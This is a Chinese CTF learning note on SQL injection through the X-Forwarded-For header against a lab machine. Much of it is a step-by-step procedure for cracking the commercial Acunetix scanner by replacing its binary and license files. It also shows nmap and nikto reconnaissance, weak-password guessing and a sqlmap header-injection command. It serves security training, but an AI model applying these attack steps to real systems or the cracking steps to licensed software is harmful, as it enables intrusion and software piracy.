我的CTF学习与教学之旅笔记7

sql注入之：(X-Forwarded-For)

本次实验，用到了acunetix，可以先下载再安装

下载地址：https://download.csdn.net/download/lm19770429/12458538

密码是大小写字母数字特殊字符选3种，>8位

注意安装后的提示：

Created symlink /etc/systemd/system/multi-user.target.wants/acunetix.service → /etc/systemd/system/acunetix.service.

Please visit https://kali:3443/ to access Acunetix UI
此时还没有破解，破解过程参考以下：

先备份一下可执行文件wvsc

mv  /home/acunetix/.acunetix/v_200217097/scanner/wvsc /home/acunetix/.acunetix/v_200217097/scanner/wvsc.bak

拷贝破解包的wvsc到scanner目录：

cp wvsc /home/acunetix/.acunetix/v_200217097/scanner/

chmod +x /home/acunetix/.acunetix/v_200217097/scanner/wvsc

拷贝授权文件到data/license/

cp license_info.json /home/acunetix/.acunetix/data/license/

systemctl restart  acunetix

 

# 安装前必须卸载之前的版本，如果没有请跳此步
systemctl stop acunetix.service
rm -rf /home/acunetix/
userdel acunetix
# 安装依赖
yum -y install libXrender libXext libXcursor libXfixes libXcomposite libXrandr libXdamage libXtst libXi cups-libs dbus-glib libXrandr libXcursor libXinerama cairo cairo-gobject pango libXScrnSaver libatk-bridge-2.0.so.0 gtk3 bzip2
# 开始安装
chmod +x acunetix_12.0.190902105_x64.sh
./acunetix_12.0.190902105_x64.sh

# 解决`GLIBCXX_3.4.21' not found错误方法
# wget https://linkingvision.com/download/h5stream/centos7/buildgcc.sh
wget https://linkingvision.com/download/h5stream/centos7/libstdc%2B%2B.so.6.0.21
cp libstdc++.so.6.0.21 /usr/lib64/libstdc++.so.6
# 解决libc.so.6: version `GLIBC_2.18' not found问题
https://www.jianshu.com/p/513e01fbd3e0
# 解决破解过段时间过期问题 未验证，仅供参考。
rm  /home/acunetix/.acunetix/data/license/wa_data.dat
touch /home/acunetix/.acunetix/data/license/wa_data.dat
chattr +i /home/acunetix/.acunetix/data/license/wa_data.dat

nmap -sV IP地址

发现只有80端口开放，http协议

nikto -host       IP：port       进行扫描

发现有一个登录界面：首先猜猜弱口令：123456 admin。本例中失败！！！

利用acunetix进行web安全漏洞扫描

发现sql盲注漏洞如下，红字是高危漏洞点击看详情

sqlmap -u http://10.10.10.129/ --headers="X-Forwarded-For:*" --dbs --batch

经过以下一系列破解得到

登录admin/login.php